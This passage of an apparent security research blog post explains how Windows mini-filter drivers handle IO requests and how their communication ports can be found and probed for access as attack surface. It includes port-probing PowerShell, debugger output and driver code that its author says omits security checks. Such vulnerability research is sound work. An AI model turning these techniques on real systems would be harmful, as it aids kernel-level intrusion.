I’m assuming you have some prior knowledge on how the IO Manager works and have experience in finding security issues in non-filter drivers. Also I’m not claiming this to be an exhaustive description of bug hunting in filter drivers as the topic is very deep and complex. With this in mind let’s start with an overview of how a filter driver works.

Filter Driver Implementation

A filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call, the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.

A filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.

  • Pass the IRP unmodified directly to the next driver in the stack.
  • Modify the IRP then pass to the next driver.
  • Modify the IRP response.
  • Complete the IRP operation with a success result.
  • Complete the IRP operation with an error result.
  • Pass the IRP to a different device stack.

These are the basics of how a filter driver works: the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received it can perform one of the operations above to filter the request. If it wants to inspect or modify the response it can register a completion routine and handle the operation in that callback.

It’s important to note that the IRP doesn’t automatically propagate down the stack. A driver can choose to complete the IRP which means it’ll not be processed by any other driver down the stack. If the driver passes on the IRP the driver must register a completion routine otherwise it’ll not be notified when the IRP has been processed by the lower drivers in the stack.

For a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.

The Filter Manager and Mini-Filters

Implementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don’t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It’s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.

To make it easier to write a filter driver Windows comes with the Filter Manager Driver which takes care of handling IO requests and device stacks. This allows a developer to write what’s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.

As you can see the mini-filters don’t add their own device objects to the stack. Instead they are registered with the filter manager and it’s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn’t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.

Another useful feature is that the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making an IO request. When handling responses the altitudes are processed in reverse order, so the filter at 5000 will be called first, then the one at 10000. Officially the altitude values must be registered with Microsoft. MSDN contains a list of the currently registered altitudes. However, there’s nothing to stop a driver from registering itself with a different altitude, except that it’ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver’s ordering may change depending on load order.
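
The ordering rule can be sketched with a small user-mode model in C. This is not filter manager code: the toy_filter type and the order_for_request and order_for_response helpers are hypothetical names invented for illustration, and the model assumes nothing beyond "highest altitude first on the way down, reverse on the way back".

```c
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical stand-in for a registered mini-filter. */
typedef struct {
    const char *name;
    unsigned long altitude;
} toy_filter;

/* qsort comparator: highest altitude sorts first. */
static int by_altitude_desc(const void *a, const void *b) {
    const toy_filter *fa = a;
    const toy_filter *fb = b;
    if (fa->altitude == fb->altitude) return 0;
    return fa->altitude > fb->altitude ? -1 : 1;
}

/* Request path: the highest altitude is visited first. */
void order_for_request(toy_filter *filters, size_t count) {
    qsort(filters, count, sizeof(filters[0]), by_altitude_desc);
}

/* Response path: the exact reverse of the request order. */
void order_for_response(toy_filter *filters, size_t count) {
    order_for_request(filters, count);
    for (size_t i = 0; i < count / 2; i++) {
        toy_filter tmp = filters[i];
        filters[i] = filters[count - 1 - i];
        filters[count - 1 - i] = tmp;
    }
}
```

Feeding it the altitudes 10000 and 5000 from the example above puts the 10000 filter first for a request and the 5000 filter first for a response.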

Mini-Filter Registration

A mini-filter driver registers its presence by calling the FltRegisterFilter filter manager API, normally during the driver’s entry point. The main parameter is a FLT_REGISTRATION structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).

C:\> fltmc

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
bindflt                                 1       409800         0
WdFilter                               17       328010         0
storqosflt                              1       244000         0
wcifs                                   0       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                    14        40700         0
FileInfo                               17        40500         0

The output lists each registered mini-filter, its number of instances (the number of volumes it is attached to) and its altitude. There are 19 volumes available for filtering in the system I tested on (according to running fltmc volumes) so no filter is attached to everything. A driver can select and decide what volumes it wants to attach to by assigning an instance setup callback to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment.

You can view what volumes a filter is attached to using fltmc again:

C:\> fltmc instances -f luafv

Instances for luafv filter:

Volume Name     Altitude        Instance Name       Frame  VlStatus
------------- ------------  ----------------------  -----  --------
C:               135000     luafv                     0

This just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive, it’s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands; we’ll show an example of using these commands later.

NOTE: Just because a filter driver is attached to a volume it doesn’t mean it’ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it’ll only enable itself if there’s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.

Most mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.

Mini-Filter IO Request Operation Callbacks

By far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of FLT_OPERATION_REGISTRATION structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn’t need to specify both if it doesn’t need both. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.

const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_CREATE,
      0,
      PreCreateOperation,
      PostCreateOperation },
    { IRP_MJ_OPERATION_END }
};
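
How such a terminated list gets consumed can be sketched in portable C. The types below are simplified, hypothetical stand-ins (toy_operation_registration, find_registration, toy_noop) rather than the real FLT_OPERATION_REGISTRATION definitions; only the 0x80 terminator comes from the text, and the other two major codes are the values I understand the WDK to use.

```c
#include <stddef.h>

/* Major codes; 0x80 is the terminator value given in the text. */
#define TOY_IRP_MJ_CREATE               0x00
#define TOY_IRP_MJ_FILE_SYSTEM_CONTROL  0x0d
#define TOY_IRP_MJ_OPERATION_END        0x80

typedef int (*toy_callback)(void);

/* Simplified, hypothetical version of one registration entry. */
typedef struct {
    unsigned char major_function;
    unsigned long flags;
    toy_callback pre_operation;   /* may be NULL */
    toy_callback post_operation;  /* may be NULL */
} toy_operation_registration;

/* Placeholder callback so an entry has something to point at. */
int toy_noop(void) { return 0; }

/*
 * Walk the list until the terminator entry. Returns the entry for the
 * requested major code, or NULL when the filter did not register for it
 * (the case where the filter manager's default handling would apply).
 */
const toy_operation_registration *
find_registration(const toy_operation_registration *list,
                  unsigned char major) {
    for (; list->major_function != TOY_IRP_MJ_OPERATION_END; list++) {
        if (list->major_function == major) {
            return list;
        }
    }
    return NULL;
}
```

A list without the terminator entry would make this loop run off the end of the array, which is why the terminator matters when you read a driver's registration table in a disassembler.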

A pre-request callback accepts three parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • An output pointer which can be assigned a callback context.

The prototype of the callback function pointer is:

typedef FLT_PREOP_CALLBACK_STATUS
(*PFLT_PRE_OPERATION_CALLBACK) (
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID *CompletionContext
    );

The parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure’s Iopb field which is an FLT_IO_PARAMETER_BLOCK structure. The parameters are similar to the ones exposed through the IRP’s current IO_STACK_LOCATION structure. The data parameter also contains the IO_STATUS_BLOCK for the request and the caller’s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:

Name                             Value  Description
-------------------------------  -----  -----------
FLT_PREOP_SUCCESS_WITH_CALLBACK  0      The callback was successful. Pass on the IO request and get a post-operation callback after completion.
FLT_PREOP_SUCCESS_NO_CALLBACK    1      The callback was successful. Pass on the IO request. No callback required.
FLT_PREOP_PENDING                2      Mark the IO operation as pending.
FLT_PREOP_DISALLOW_FASTIO        3      If handling a Fast IO operation, fail it to force the operation as a normal IO Request.
FLT_PREOP_COMPLETE               4      The operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack.
FLT_PREOP_SYNCHRONIZE            5      Synchronize the post-operation callback in the same thread.
FLT_PREOP_DISALLOW_FSFILTER_IO   6      Disallow FastIO file creation.

A post-request callback accepts four parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • A context pointer which could have been assigned by the pre-operation callback.
  • Additional flags.

For post-operation callbacks the prototype is as follows:

typedef FLT_POSTOP_CALLBACK_STATUS
(*PFLT_POST_OPERATION_CALLBACK) (
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID CompletionContext,
    FLT_POST_OPERATION_FLAGS Flags
);

The parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.

Name                                 Value  Description
-----------------------------------  -----  -----------
FLT_POSTOP_FINISHED_PROCESSING       0      The callback was successful. No further processing required.
FLT_POSTOP_MORE_PROCESSING_REQUIRED  1      Halts completion of the IO request. The operation will be pending until the filter driver completes it.
FLT_POSTOP_DISALLOW_FSFILTER_IO      2      Disallow FastIO file creation.

Handling IO Requests

Now that we’ve described registration of the mini-filter and its callbacks let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. We’ll use the six operations I mentioned earlier as a base for this discussion. The examples demonstrate the kind of code you’re likely to find in a driver but omit security checks and other unimportant details. This isn’t Stack Overflow, so please don’t copy and paste them into real drivers.

Pass the IO request unmodified

The simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we’re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback.

The easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.

To give an example, the following pre-create operation callback will ignore any open request whose desired access does not include the FILE_WRITE_DATA access right. If the access right isn’t requested then the request is passed on with no post-operation callback.

FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    // Parameters is the FLT_PARAMETERS union inside the IO parameter block.
    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;
    ACCESS_MASK access = ps->Create.SecurityContext->DesiredAccess;

    // No write access requested: pass the request on without a post-operation callback.
    if ((access & FILE_WRITE_DATA) == 0) {
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    }

    // Perform some operation...
}

The example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.

Of course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.

When the driver specifies it wants a post-operation callback it can configure the CompletionContext with any value it likes. This context can then be used in the post-operation callback. This can be used to pass additional data between the callbacks so that the post-operation callback can perform its operation correctly.

Modify the IO request

During a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the FltSetCallbackDataDirty API however all that currently does is set the flag.

Modify the IO request response

As with the request you can modify the response in the post-operation callback which will return the changes to higher mini-filters and the IO manager. One trick I’ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE as if the file system had encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.

FLT_POSTOP_CALLBACK_STATUS LuafvReparse(PFLT_CALLBACK_DATA Data,
                                        PUNICODE_STRING TargetFileName) {
  // Tag the request with an ECP so the restarted create can be recognized.
  LuafvSetEcp(Data, TargetFileName);

  // Swap the file object's name buffer for a copy of the new target path.
  PFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;
  ExFreePool(FileObject->FileName.Buffer);
  FileObject->FileName.Buffer = ExAllocatePool(PagedPool,
                                        TargetFileName->Length);
  FileObject->FileName.MaximumLength = TargetFileName->Length;
  RtlCopyUnicodeString(&FileObject->FileName, TargetFileName);

  // Report a reparse so the IO manager restarts the create with the new name.
  Data->IoStatus.Information = 0;
  Data->IoStatus.Status = STATUS_REPARSE;
  FltSetCallbackDataDirty(Data);
  return FLT_POSTOP_FINISHED_PROCESSING;
}

The code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 the IoReplaceFileObjectName API was introduced which makes this operation much less error prone, however LUAFV was written for Vista where the API didn’t exist so it had to make do. An official Microsoft example can be found in the SimRep sample driver.

One quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\windows\notepad.exe then FileName is set to \windows\notepad.exe. However, you can replace that with an absolute path such as \??\d:\abc.txt and that still works. Also the driver doesn’t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.

Complete the IO request with a success result

The driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you’re only updating the IO_STATUS_BLOCK you don’t need to mark the data as dirty.

Higher level filter drivers will still get their post-operation callbacks invoked if they’re registered for them, however no lower altitude drivers will be called with the IO request.
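
The effect of completing a request part-way down the stack can be illustrated with a toy user-mode model in C. The enum values are copied from the FLT_PREOP_CALLBACK_STATUS table earlier in this post; everything else (toy_filter_slot, toy_dispatch) is a hypothetical simplification that only tracks which callbacks would run, not what the filter manager actually does internally.

```c
#include <stddef.h>

/* Values copied from the FLT_PREOP_CALLBACK_STATUS table. */
enum toy_preop_status {
    TOY_PREOP_SUCCESS_WITH_CALLBACK = 0,
    TOY_PREOP_SUCCESS_NO_CALLBACK   = 1,
    TOY_PREOP_COMPLETE              = 4
};

typedef struct {
    enum toy_preop_status preop_result; /* what this filter's pre-op returns */
    int pre_called;                     /* set by the model */
    int post_called;                    /* set by the model */
} toy_filter_slot;

/*
 * stack[0] is the highest altitude. The caller zeroes pre_called and
 * post_called. Returns 1 if the request would reach the file system and
 * 0 if a filter completed it first.
 */
int toy_dispatch(toy_filter_slot *stack, size_t count) {
    size_t visited = 0;
    int reached_fs = 1;

    /* Pre-operation pass: top of the stack downwards. */
    for (; visited < count; visited++) {
        stack[visited].pre_called = 1;
        if (stack[visited].preop_result == TOY_PREOP_COMPLETE) {
            reached_fs = 0;  /* lower filters never see the request */
            break;
        }
    }

    /* Post-operation pass: unwind through the filters above the stopping
     * point, lowest first, calling only those that asked for a callback. */
    for (size_t i = visited; i-- > 0;) {
        if (stack[i].preop_result == TOY_PREOP_SUCCESS_WITH_CALLBACK) {
            stack[i].post_called = 1;
        }
    }
    return reached_fs;
}
```

With three filters where the middle one returns the complete status, the top filter gets both callbacks, the middle filter gets only its pre-operation callback and the bottom filter is never called.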

Complete the IO request with an error result

This is basically the same as for a success code, just specifying a different NT status. There’s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success.

Pass the IO request to a different file or device stack

The filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they’re not.

The most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.

First, how can a filter driver interact with a file system volume it’s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call IoCreateFile (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.

This issue is solved through two mechanisms. The first is the filter manager exposes a set of APIs which mirror the kernel IO APIs but will only dispatch the IO request to filters below the caller. For example you can call FltCreateFileEx or FltWriteFile and be sure you won’t end up in a loop.

For file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the FltInsertExtraCreateParameter API. The filter driver can attach the ECP to the request, then check for its presence using FltFindExtraCreateParameter API, allowing it to ignore the request. For example the earlier code which shows how LUAFV implements a reparse operation shows calling LuafvSetEcp which sets an ECP on the request so that the new create request can be ignored by the driver.
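
The ECP idea can be modelled in a few lines of portable C. This is only a sketch of the tagging pattern: toy_guid, toy_create_request and the three helpers are hypothetical, and the real FltInsertExtraCreateParameter and FltFindExtraCreateParameter APIs take different arguments and operate on an ECP list owned by the IO manager.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical 16-byte identifier standing in for an ECP GUID. */
typedef struct { unsigned char bytes[16]; } toy_guid;

#define TOY_MAX_ECPS 4

/* Hypothetical create request carrying a small list of ECP tags. */
typedef struct {
    toy_guid ecps[TOY_MAX_ECPS];
    size_t ecp_count;
} toy_create_request;

/* Attach a tag to the request. Returns 0 on success, -1 if full. */
int toy_insert_ecp(toy_create_request *req, const toy_guid *id) {
    if (req->ecp_count == TOY_MAX_ECPS) return -1;
    req->ecps[req->ecp_count++] = *id;
    return 0;
}

/* Returns 1 if the tag is present on the request, 0 otherwise. */
int toy_find_ecp(const toy_create_request *req, const toy_guid *id) {
    for (size_t i = 0; i < req->ecp_count; i++) {
        if (memcmp(&req->ecps[i], id, sizeof(*id)) == 0) return 1;
    }
    return 0;
}

/* A filter skips any create request that already carries its own tag. */
int toy_should_process_create(const toy_create_request *req,
                              const toy_guid *own_id) {
    return !toy_find_ecp(req, own_id);
}
```

The point of the pattern is that the tag travels with the request, so the filter can recognize a create it caused itself when that request comes back through the stack.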

The second issue is how do you actually pass on the parameters for the IO request to the new file you’ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.

A better approach is the driver can change the TargetFileObject field in the pre-operation callback’s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:

PREDIRECT_CONTEXT context = // Get driver’s allocated context.
if (context->FileObject) {
    Data->Iopb->TargetFileObject = context->FileObject;
    FltSetCallbackDataDirty(Data);
    return FLT_PREOP_SUCCESS_NO_CALLBACK;
}

Mini-Filter Communication

For there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is that there are multiple places where untrusted data can be processed. Let’s go through the ways of identifying and analyzing these communication channels.

Device Object

A mini-filter doesn’t need to create any device object to perform its function, as the filter manager deals with creating any necessary device objects. That doesn’t mean the driver can’t create one for its own purposes. A typical attack vector is for the malicious user to open a handle to the device object and send device IO control codes to exercise the vulnerable behavior.

I’m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there’s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers (video, slides).

Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API FltCreateCommunicationPort.

PSECURITY_DESCRIPTOR SecurityDescriptor;
FltBuildDefaultSecurityDescriptor(
  &SecurityDescriptor,
  FLT_PORT_ALL_ACCESS
);

UNICODE_STRING Name;
RtlInitUnicodeString(&Name, L"\\FilterPortName");

OBJECT_ATTRIBUTES ObjAttr;
InitializeObjectAttributes(&ObjAttr, &Name, 0, NULL, SecurityDescriptor);

PFLT_PORT Port;
FltCreateCommunicationPort(
  Filter,
  &Port,
  &ObjAttr,
  NULL,
  ConnectNotifyCallback,
  DisconnectNotifyCallback,
  MessageNotifyCallback,
  100
);

The name of the port is specified using an OBJECT_ATTRIBUTES structure; in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the FltBuildDefaultSecurityDescriptor API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the FilterConnectCommunicationPort API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

typedef NTSTATUS
(*PFLT_CONNECT_NOTIFY) (
      PFLT_PORT ClientPort,
      PVOID ServerPortCookie,
      PVOID ConnectionContext,
      ULONG SizeOfContext,
      PVOID *ConnectionPortCookie
      );

The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.
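
As a rough illustration of the kind of content checks a connect callback needs, here is a portable C sketch that validates a length-prefixed context buffer. The layout (toy_connect_header with a version and a name length), the TOY_MAX_NAME limit and the toy_validate_context function are all hypothetical; a real driver defines its own context format, and this is the sort of parsing code worth auditing when reverse engineering one.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical context layout: fixed header followed by name bytes. */
typedef struct {
    uint32_t version;
    uint32_t name_length;  /* bytes of name data following the header */
} toy_connect_header;

#define TOY_MAX_NAME 256u

/*
 * Validates the buffer and copies the name out as a NUL-terminated string.
 * Returns 0 on success, -1 if the context should be rejected.
 */
int toy_validate_context(const void *context, uint32_t size_of_context,
                         char *name_out, size_t name_out_size) {
    toy_connect_header hdr;

    /* The buffer must at least hold the fixed header. */
    if (context == NULL || size_of_context < sizeof(hdr)) return -1;

    /* Copy the header out before checking it. */
    memcpy(&hdr, context, sizeof(hdr));
    if (hdr.version != 1) return -1;
    if (hdr.name_length > TOY_MAX_NAME) return -1;

    /* Compare against the bytes remaining after the header rather than
     * computing header + length, which could overflow. */
    if (hdr.name_length > size_of_context - sizeof(hdr)) return -1;

    /* Leave room for the terminator in the output buffer. */
    if (hdr.name_length >= name_out_size) return -1;

    memcpy(name_out, (const unsigned char *)context + sizeof(hdr),
           hdr.name_length);
    name_out[hdr.name_length] = '\0';
    return 0;
}
```

The checks to look for in a real driver are the same ones shown here: a minimum size test before touching any field, and every embedded length compared against the size the filter manager reported.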

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my NtObjectManager PowerShell module run the following command:

PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName
----                                      --------
storqosfltport                            FilterConnectionPort
MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort
MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort
WcifsPort                                 FilterConnectionPort
MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort
BindFltPort                               FilterConnectionPort
MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort
CLDMSGPORT                                FilterConnectionPort
MicrosoftMalwareProtectionPortWD          FilterConnectionPort

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.

PS> $ports = ls NtObject:\ |
    Where-Object TypeName -eq "FilterConnectionPort"
PS> foreach($port in $ports.Name) {
    Write-Host "\$port"
    Use-NtObject($p = Get-FilterConnectionPort "\$port") {}
}
\BindFltPort
Exception: "(0x80070005) - Access is denied."
\CLDMSGPORT
Exception: "(0x8007017C) - The cloud operation is invalid."

We can see two ports in the output of the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid.” The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.

PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)

You can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

0: kd> !object \CLDMSGPORT
Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort
    ObjectHeader: ffffb487447ff890 (new version)
    HandleCount: 1  PointerCount: 4
    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT

0: kd> dx (((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7)
(((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7) : 0xffff8a888dccb0a0

0: kd> !sd 0xffff8a888dccb0a0 1
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x9004
            SE_DACL_PRESENT
            SE_DACL_PROTECTED
            SE_SELF_RELATIVE
->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl    :
->Dacl    : ->AclRevision: 0x2
->Dacl    : ->Sbz1       : 0x0
->Dacl    : ->AclSize    : 0x1c
->Dacl    : ->AceCount   : 0x1
->Dacl    : ->Sbz2       : 0x0
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x001f0001
->Dacl    : ->Ace[0]: ->SID: S-1-5-11 (Well Known Group: NT AUTHORITY\Authenticated Users)
->Sacl    :  is NULL

To dump the SD you first query for the object address of the filter communication port using the !object command. From the output you take the address of the OBJECT_HEADER structure and query the SecurityDescriptor field. Note you must clear the lower 3 bits of the address to make a valid security descriptor pointer. Finally we can print the security descriptor using the !sd command. The output shows that the security descriptor grants the Authenticated Users group access to connect to the port.
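The numbers in the debugger output can be checked by hand. The following is a minimal sketch in portable C, not kernel code: the helper names are made up for illustration, and the raw field value used in the usage note is hypothetical. The constants are the ones published in the Windows SDK and WDK headers.

```c
#include <assert.h>
#include <stdint.h>

/* Constants as defined in the public Windows headers. */
#define SE_DACL_PRESENT     0x0004u
#define SE_DACL_PROTECTED   0x1000u
#define SE_SELF_RELATIVE    0x8000u
#define STANDARD_RIGHTS_ALL 0x001F0000u
#define FLT_PORT_CONNECT    0x0001u

/* Mirror of the debugger expression "SecurityDescriptor & ~0x7":
 * drop the low 3 bits to recover the real pointer. */
static uint64_t sd_pointer_from_field(uint64_t raw_field) {
    return raw_field & ~(uint64_t)0x7;
}

/* Returns 1 when every bit in 'wanted' is present in 'value'. */
static int has_all_bits(uint32_t value, uint32_t wanted) {
    return (value & wanted) == wanted;
}
```

For instance, a hypothetical raw field of 0xffff8a888dccb0a5 masks down to the 0xffff8a888dccb0a0 pointer shown above. The Control value 0x9004 is exactly the three flags listed, and the ACE mask 0x001f0001 is STANDARD_RIGHTS_ALL plus FLT_PORT_CONNECT, which is why Authenticated Users can connect.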

With an open handle to the port you can now send and receive messages. The filter manager supports both user to kernel and kernel to user message directions. For the user to kernel messages you call the FilterSendMessage API which sends a raw memory buffer to the filter driver and returns a separate buffer as shown in the following prototype:

HRESULT FilterSendMessage(

  HANDLE  hPort,

  LPVOID  lpInBuffer,

  DWORD   dwInBufferSize,

  LPVOID  lpOutBuffer,

  DWORD   dwOutBufferSize,

  LPDWORD lpBytesReturned

);

The message is delivered to the filter driver’s message notification callback specified when registering the mini-filter. The callback has the following prototype.

typedef NTSTATUS

(*PFLT_MESSAGE_NOTIFY) (

      IN PVOID PortCookie,

      IN PVOID InputBuffer OPTIONAL,

      IN ULONG InputBufferLength,

      OUT PVOID OutputBuffer OPTIONAL,

      IN ULONG OutputBufferLength,

